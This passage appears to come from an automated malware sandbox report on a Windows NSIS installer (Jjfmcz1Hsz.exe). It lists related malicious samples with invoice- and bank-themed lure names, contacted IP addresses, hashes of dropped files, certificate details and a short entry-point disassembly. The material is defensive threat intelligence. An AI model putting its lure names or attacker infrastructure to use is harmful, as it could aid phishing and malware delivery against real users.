                                                                                                                                    • 195.24.68.23
                                                                                                                                    HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Purchase List_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Purchase List_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Purchase List_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Purchase List_pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    Shipment Documentation-REF GZARX019-10-22.bat.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    RMTT Documentation-REF GZARX019-10-22.exeGet hashmaliciousBrowse
                                                                                                                                    • 195.24.68.23
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    XIAOZHIYUN1-AS-APICIDCNETWORKUSpiyMkUBOS9.exeGet hashmaliciousBrowse
                                                                                                                                    • 154.210.211.80
                                                                                                                                    UU.exeGet hashmaliciousBrowse
                                                                                                                                    • 45.207.106.144
                                                                                                                                    Advice Ref SCA1Sv2.exeGet hashmaliciousBrowse
                                                                                                                                    • 156.254.174.120
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 156.254.145.14
                                                                                                                                    Urgent quote request -pdf-.exeGet hashmaliciousBrowse
                                                                                                                                    • 154.222.125.220
                                                                                                                                    Lakeringernes (1).exeGet hashmaliciousBrowse
                                                                                                                                    • 154.204.24.45
                                                                                                                                    output(1)(1).jsGet hashmaliciousBrowse
                                                                                                                                    • 156.254.145.14
                                                                                                                                    Quote.jsGet hashmaliciousBrowse
                                                                                                                                    • 156.234.70.54
                                                                                                                                    MviPEORLUw.elfGet hashmaliciousBrowse
                                                                                                                                    • 156.253.67.15
                                                                                                                                    6Q7NVvtgwT.elfGet hashmaliciousBrowse
                                                                                                                                    • 156.253.80.8
                                                                                                                                    kH7E1Hh6Kn.elfGet hashmaliciousBrowse
                                                                                                                                    • 156.253.91.121
                                                                                                                                    nullnet_load.arm7.elfGet hashmaliciousBrowse
                                                                                                                                    • 156.253.103.103
                                                                                                                                    Doc MT103 _pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 45.207.91.148
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 156.254.145.14
                                                                                                                                    Bm5ck7xf3Q.elfGet hashmaliciousBrowse
                                                                                                                                    • 154.210.135.157
                                                                                                                                    icsS4j4eQj.elfGet hashmaliciousBrowse
                                                                                                                                    • 156.226.137.230
                                                                                                                                    SWIFT Transfer (103) 022FT102211200045.exeGet hashmaliciousBrowse
                                                                                                                                    • 156.254.147.131
                                                                                                                                    Aposporogony.exeGet hashmaliciousBrowse
                                                                                                                                    • 154.204.24.45
                                                                                                                                    payment copy_$31,400.exeGet hashmaliciousBrowse
                                                                                                                                    • 156.253.89.190
                                                                                                                                    lvHi6S56bE.elfGet hashmaliciousBrowse
                                                                                                                                    • 156.253.91.133
                                                                                                                                    UNIFIEDLAYER-AS-1USBNK0002334269532_USD28,770.00.exeGet hashmaliciousBrowse
                                                                                                                                    • 192.185.90.105
                                                                                                                                    Jyoti CNC Automation Ltd.exeGet hashmaliciousBrowse
                                                                                                                                    • 192.185.90.105
                                                                                                                                    OUTSTANDING PI770100059 SOA OCT 2022.IMGGet hashmaliciousBrowse
                                                                                                                                    • 74.220.219.219
                                                                                                                                    ZG11Q8WGTS.elfGet hashmaliciousBrowse
                                                                                                                                    • 74.91.251.217
                                                                                                                                    swift(USD 17043.50).exeGet hashmaliciousBrowse
                                                                                                                                    • 192.185.136.234
                                                                                                                                    3ts2As2Bkm.exeGet hashmaliciousBrowse
                                                                                                                                    • 108.167.164.216
                                                                                                                                    2WDAob2RQA.elfGet hashmaliciousBrowse
                                                                                                                                    • 74.91.145.220
                                                                                                                                    Confirmation transfer Ref No_00101334632192.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.214.129.149
                                                                                                                                    BNK0002334789532_USD28,770.00.exeGet hashmaliciousBrowse
                                                                                                                                    • 192.185.90.105
                                                                                                                                    PGV44hRizw.elfGet hashmaliciousBrowse
                                                                                                                                    • 66.147.255.245
                                                                                                                                    OUTSTANDING PI770100059 SOA OCT 2022.IMGGet hashmaliciousBrowse
                                                                                                                                    • 108.167.180.185
                                                                                                                                    overdue invoices-pdf.vbsGet hashmaliciousBrowse
                                                                                                                                    • 192.185.145.188
                                                                                                                                    Statement_xls.vbsGet hashmaliciousBrowse
                                                                                                                                    • 192.185.145.188
                                                                                                                                    Cheshire_east_council_section_106_agreement (zx).jsGet hashmaliciousBrowse
                                                                                                                                    • 162.215.212.3
                                                                                                                                    BtbF18j4rkiRbxt.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.241.24.92
                                                                                                                                    http://www.emmajewelers.comGet hashmaliciousBrowse
                                                                                                                                    • 69.49.244.173
                                                                                                                                    PAYMENT SLIP.exeGet hashmaliciousBrowse
                                                                                                                                    • 50.87.139.143
                                                                                                                                    DHL_AWB_NO#907853880911.exeGet hashmaliciousBrowse
                                                                                                                                    • 192.185.120.58
                                                                                                                                    aifdvvzopt.exeGet hashmaliciousBrowse
                                                                                                                                    • 162.241.169.26
                                                                                                                                    SecuriteInfo.com.Win32.InjectorX-gen.829.1269.exeGet hashmaliciousBrowse
                                                                                                                                    • 192.185.90.105
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    37f463bf4616ecd445d4a1937da06e19https://es.sonicurlprotection-sjl.com/click?PV=2&MSGID=202212051136097531779&URLID=2&ESV=10.0.19.7431&IV=9A53CBD45BBEDDCF9F4B1BF37EE3E4CD&TT=1670240177446&ESN=tZaJ%2BjQWDsinfA98GgjS9QDOnNv%2BVAl0n4pOFvjZ6Hg%3D&KV=1536961729280&B64_ENCODED_URL=aHR0cHM6Ly9jbHQxNTE3MTY4LmJtZXRyYWNrLmNvbS9jL2w_dT1FQkIzMjEzJmFtcDtlPTE1NkIzNTgmYW1wO2M9MTcyNjcwJmFtcDt0PTEmYW1wO2w9OTg0OTRENDImYW1wO2VtYWlsPUpweURtbloyc05XYWZXY3B4NEY4SW5ubGtSakxVYlBlJmFtcDtzZXE9MSN0bnVnZW50QGNvbnRyYWN0cGhhcm1hY3kuY29t&HK=B80F276AC0E91EF98F7CC4B21AD04CF90DE4E3232CDD268E7884D89161F641B6Get hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    https://es.sonicurlprotection-sjl.com/click?PV=2&MSGID=202212051136097531779&URLID=4&ESV=10.0.19.7431&IV=657FF24C69FF82EE3B9B00769C38D0FA&TT=1670240177446&ESN=5h9%2BlKNQqrl4M%2F4G4Ek41r9YJCiP2XMFBznuhhBA2nQ%3D&KV=1536961729280&B64_ENCODED_URL=aHR0cHM6Ly9jbHQxNTE3MTY4LmJtZXRyYWNrLmNvbS9jL2w_dT1FQkIzMjEzJmU9MTU2QjM1OCZjPTE3MjY3MCZ0PTEmbD05ODQ5NEQ0MiZlbWFpbD1KcHlEbW5aMnNOV2FmV2NweDRGOElubmxrUmpMVWJQZSZzZXE9MSN0bnVnZW50QGNvbnRyYWN0cGhhcm1hY3kuY29t&HK=895370D62CE54A7B285B0BFE18DCDAE5FCEEDFA348C173646A698190DA618F7EGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    https://es.sonicurlprotection-sjl.com/click?PV=2&MSGID=202212051136097531779&URLID=3&ESV=10.0.19.7431&IV=87E67649CF0269E8A2BDD2E1D11B868E&TT=1670240177446&ESN=4iW4mdEXKfDFErppG5T0ibiQ8fDnhVtmCNUVqLiwf8w%3D&KV=1536961729280&B64_ENCODED_URL=aHR0cHM6Ly9jbHQxNTE3MTY4LmJtZXRyYWNrLmNvbS9jL2w_dT1FQkIzMjEzJmU9MTU2QjM1OCZjPTE3MjY3MCZ0PTEmbD05ODQ5NEQ0MiZlbWFpbD1KcHlEbW5aMnNOV2FmV2NweDRGOElubmxrUmpMVWJQZSZzZXE9MSN0bnVnZW50QGNvbnRyYWN0cGhhcm1hY3kuY29t&HK=4A36096343D4AEC5BB533C70DBAA0FDF4F195EEF77821F9CE3FF7F2AF6DB742BGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    Benefits_Enrollment.shtmlGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    https://jj.newsstes.online/.01Get hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    nEry5lekj8.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    g0OhMx7a1m.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    g0OhMx7a1m.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    https://netflexapp.builderallwppro.com/skat22/Get hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    Benefits_Enrollment.shtmlGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    #Uc800#Uc791#Uad8c#Ubc95 #Uad00#Ub828 #Ub0b4#Uc6a9#Uc99d#Uba85#Uc11c#Uc2dc#Uc2a4#Ud15c.docxGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    #Uc784#Ubc94#Uc218.docxGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    SecuriteInfo.com.Win32.Evo-gen.24201.15247.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    #Uc800#Uc791#Uad8c#Ubc95 #Uad00#Ub828 #Ub0b4#Uc6a9#Uc99d#Uba85#Uc11c#Uc2dc#Uc2a4#Ud15c.docxGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    Bc1N48FGww.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    E3R9lqfu1G.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    SecuriteInfo.com.Win32.Malware-gen.15285.91.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    Benefits_Enrollment.shtmlGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    1697-1698-1699pdf.exeGet hashmaliciousBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.184.225
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsl1543.tmp\System.dllPmRXFyOFkf.exeGet hashmaliciousBrowse
                                                                                                                                      PmRXFyOFkf.exeGet hashmaliciousBrowse
                                                                                                                                        Lakeringernes (1).exeGet hashmaliciousBrowse
                                                                                                                                          Lakeringernes (1).exeGet hashmaliciousBrowse
                                                                                                                                            proforma.exeGet hashmaliciousBrowse
                                                                                                                                              proforma.exeGet hashmaliciousBrowse
                                                                                                                                                factura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  factura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    factura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      factura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        factura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          factura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            payload.exeGet hashmaliciousBrowse
                                                                                                                                                              payload.exeGet hashmaliciousBrowse
                                                                                                                                                                FACTURA pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  FACTURA pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                    Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                                                      Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                                                        factura 1722 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                          Process:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):122880
                                                                                                                                                                          Entropy (8bit):1.1305327154874678
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                                                                                                                          MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                                                                                                                          SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                                                                                                                          SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                                                                                                                          SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                          Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):134250
                                                                                                                                                                          Entropy (8bit):7.998560975106141
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:3072:fGPy6FfzSxjEl2NrGiobRMQnzGopHc+wyrry:ua6Ff2xjwPzZcTQy
                                                                                                                                                                          MD5:FF0BD6DD5159F28FB1032525A36F7C17
                                                                                                                                                                          SHA1:8241D741F3327FEC5F681E475BD21991B7CAE494
                                                                                                                                                                          SHA-256:39293106CCA10EA737DB6D5D79591B3C3A1946CEF2C8824D802E9EB6D959AF40
                                                                                                                                                                          SHA-512:761CC23AB8E5FFBD704351F656AD07FE94BAA80F121B15699D878832F4F4D8CF6AED454EDAB780B21349EB00C1526E647BF008BE942B5CC7A1F36877D82CF875
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:bfi.>.Y..Z$.^..b.L.2=?....U{.`....J1S..b:.v..A1./....@.....0/jT..(.......&.X.!T.....g. .J..LN.7.a.0...t6:.a.......m.]..@S...Y.7Fa{.....9........n.:.r...#...jn.j.{...T.....SG.m..U/...-...,.6R.h.&}...p2.B.Q0+o..N.O.q`F.do].......X........y.>.....Y..w*r.J..J.U.A...[..<0&T..q.o..`P.p.9.....GuL.............`..)X....*1.@..1..y.Il.oK...?.i./..a.X+...p......).....d..J..T...L.....c..[....4..\N.......g~.d..9..M.\.?.x...b.?....Xa.i....9.e.k..-..........sG..uV?.7..I...v...7s$.E........6.]..+..{....l.G..biM.I.....4?....>w..(...=vi...9...9-.]G.40...@]..2...#...z.a....r.B(..u...B...Xn..G...u:S0s....9.k>{..v.#.fA...=...0..u.3A..\_..[.;w..,..X5A.....<3.....2...Ws.....06..k......pv.5..l...Xr|...1a....j..3o..8.Fd.L+.1.....0j......%'...S..N~.}...rgQQ.c...m;E..J..u5j...K..,? ......,#..#.........f......L.T..[k.n..;w.......G....7..n......D.4j.v.3.t..@..w.!HK\..1..%Sy...o....G.R.C.....hs..~...F.lA..<.....j.h...O.F.e..@..P.#h.........C....t....?...v.....
                                                                                                                                                                          Process:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):183714
                                                                                                                                                                          Entropy (8bit):6.693816749725693
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:/Bk2P9pu9pC/yG3YhAu/TepE0KPiVL442m:J91MC732Au/ipE0154Q
                                                                                                                                                                          MD5:659325AF9C23B36297F8B4B220F2705C
                                                                                                                                                                          SHA1:F56B8A48E6DB00C404BAA1CCFFFF9AA000AC9E11
                                                                                                                                                                          SHA-256:10E81CAD6732488F986BF994A832A0B4B8A437B2B7CEB86EB22ADEF28DC4DAFA
                                                                                                                                                                          SHA-512:08B886397B9E6A9941AB2184C06F64F0356AE79BCECDF78EFFA93D51FE0752CBDC55B74EF872556520A7AC192F04FF3A1FA6764750690FCDDB462EC7B9ED35EE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
                                                                                                                                                                          Process:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          File Type:Generic INItialization configuration [Effect2]
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5487
                                                                                                                                                                          Entropy (8bit):4.3524133300305206
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:hJDu0BoU1s8G9LfGOOOOOOjOOOOOOEOOOOOOBOOOOOONsOOOOOO/OOOOOOAOOOOW:mCs8GVfGOOOOOOjOOOOOOEOOOOOOBOO4
                                                                                                                                                                          MD5:9D3C4AEBBDBCB28530EF93081611A33E
                                                                                                                                                                          SHA1:867F6A5B16638E1BFC012DFF7E63E45ADD44342E
                                                                                                                                                                          SHA-256:24EC6D9A80EF077A81018001F16E7D7EFE6DEB82B7BD120C8C5227BA65C63F07
                                                                                                                                                                          SHA-512:4E5E2ADAE00F160EBDB322B12C33582F8397B909841E76FA634D10C3BCAF90C822DA8F9F494A29FA0EA4B558B6D44BAAEBAF737156B6E38359FB5CFC36874D2E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;Static - FW effect index 0..[Effect1]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=0..Color2R=0..Color2G=0..Color2B=0..DirectType=0..SpeedType=0....;Breath - FW effect index 1..[Effect2]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=49..Color2R=8..Color2G=255..Color2B=240..SpeedType=2..DirectType=0..MusicType=0..CometType=0..StarType=0..TriggerType=0..TemperatureH=0..TemperatureL=0....;Strobing - FW effect index 2..[Effect3]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=102..Color2R=0..Color2G=0..Color2B=0..SpeedType=2..DirectType=0..MusicType=0..CometType=0..StarType=0..TriggerType=0..TemperatureH=0..TemperatureL=0....;ColorCycle - FW effect index 4..[Effect4]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=60..Color2R=0..Color2G=0..Color2B=0..SpeedType=2..DirectType=1..MusicType=0..CometType=0..StarType=0..TriggerType=0..TemperatureH=0..TemperatureL=0....;Rainbow - FW effect index 8..[E
                                                                                                                                                                          Process:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                          Entropy (8bit):4.131687083026442
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:pDQo7JKU2QYEJry:FQov1YEw
                                                                                                                                                                          MD5:09EFF7D465578AB16342D01B9115172C
                                                                                                                                                                          SHA1:13311B4DEBC749082CFB1A65DA02759642A9C1D7
                                                                                                                                                                          SHA-256:1B5F1F40B8BA4A1F6C314D8C2E1F16D138A70C0D96A3010CF4EC4D44110A443F
                                                                                                                                                                          SHA-512:62F99CCB5C6E936A61279DCA2AECB61D6B1B7E3E7E750B0D4C38F10BFE3EE0CE02BC58FA2B87C6784BF60BE0A700BBF179FD8905781E6B0007DE64B8B391685F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[Decimallngdernes]..Floragrafere=Palms..
                                                                                                                                                                          Process:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                          Entropy (8bit):5.770803561213006
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
                                                                                                                                                                          MD5:2AE993A2FFEC0C137EB51C8832691BCB
                                                                                                                                                                          SHA1:98E0B37B7C14890F8A599F35678AF5E9435906E1
                                                                                                                                                                          SHA-256:681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
                                                                                                                                                                          SHA-512:2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: PmRXFyOFkf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: PmRXFyOFkf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Lakeringernes (1).exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Lakeringernes (1).exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: proforma.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: proforma.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: payload.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: payload.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: FACTURA pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: FACTURA pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Tudbrlet.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Tudbrlet.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: factura 1722 pdf.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.923758478946491
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:Jjfmcz1Hsz.exe
                                                                                                                                                                          File size:298144
                                                                                                                                                                          MD5:f4cad3f0195d098ced41c4926a5695c2
                                                                                                                                                                          SHA1:3fb8e89ac063889b73d65e66fff6760100d59d15
                                                                                                                                                                          SHA256:72abd0b67059b670e94fb0b2397e3b4334d0effbab4a1dc1a659780eacce4984
                                                                                                                                                                          SHA512:bb448efbc2a79bd74cda1e29004d23196146047ad5100c71b4c92a1d6026aaf97e4a3ff05db5ca01ac7697124ff86dd6c1417eb02f9766da51c5d0e9c31714d5
                                                                                                                                                                          SSDEEP:6144:vC2zExgrpHojHH+LqA4Ewfra6Ff2xjwPzZcTQXn8F:r0grpHJqA4EwfrXh7ZOZ
                                                                                                                                                                          TLSH:865412054F728017DBE746B90AF7FBB4EBF9D71265211B8B23189AEE2910783C56530D
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........
                                                                                                                                                                          Icon Hash:f89ab6b68aa686ec
                                                                                                                                                                          Entrypoint:0x4030d9
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x5795638D [Mon Jul 25 00:55:41 2016 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:OU="Regarder Halssmykke Fakturaernes ", E=Wordspinner@Elsklinger.Ic, O=Fingernails, L=Weston, S=England, C=GB
                                                                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                          Error Number:-2146762487
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 05/10/2022 07:47:04 04/10/2025 07:47:04
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • OU="Regarder Halssmykke Fakturaernes ", E=Wordspinner@Elsklinger.Ic, O=Fingernails, L=Weston, S=England, C=GB
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:8EB54C0BFF1B3DA79A43DB8D1178F924
                                                                                                                                                                          Thumbprint SHA-1:A33F7A1725293C2FE9EDB4E84FD59D2825F30096
                                                                                                                                                                          Thumbprint SHA-256:79F5257BD0CCEEDE577544366C2412E54EFC715947DC2839F6E7D9ECFCB484FB
                                                                                                                                                                          Serial:1FD1066F27A2D2F2
                                                                                                                                                                          Instruction
                                                                                                                                                                          sub esp, 00000184h
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                                                                          mov dword ptr [esp+10h], 00409198h
                                                                                                                                                                          mov dword ptr [esp+20h], ebx
                                                                                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                          call dword ptr [004070A8h]
                                                                                                                                                                          call dword ptr [004070A4h]
                                                                                                                                                                          cmp ax, 00000006h
                                                                                                                                                                          je 00007FCA093585C3h
                                                                                                                                                                          push ebx
                                                                                                                                                                          call 00007FCA0935B531h
                                                                                                                                                                          cmp eax, ebx
                                                                                                                                                                          je 00007FCA093585B9h
                                                                                                                                                                          push 00000C00h
                                                                                                                                                                          call eax
                                                                                                                                                                          mov esi, 00407298h
                                                                                                                                                                          push esi
                                                                                                                                                                          call 00007FCA0935B4ADh
                                                                                                                                                                          push esi
                                                                                                                                                                          call dword ptr [004070A0h]
                                                                                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                          cmp byte ptr [esi], bl
                                                                                                                                                                          jne 00007FCA0935859Dh
                                                                                                                                                                          push ebp
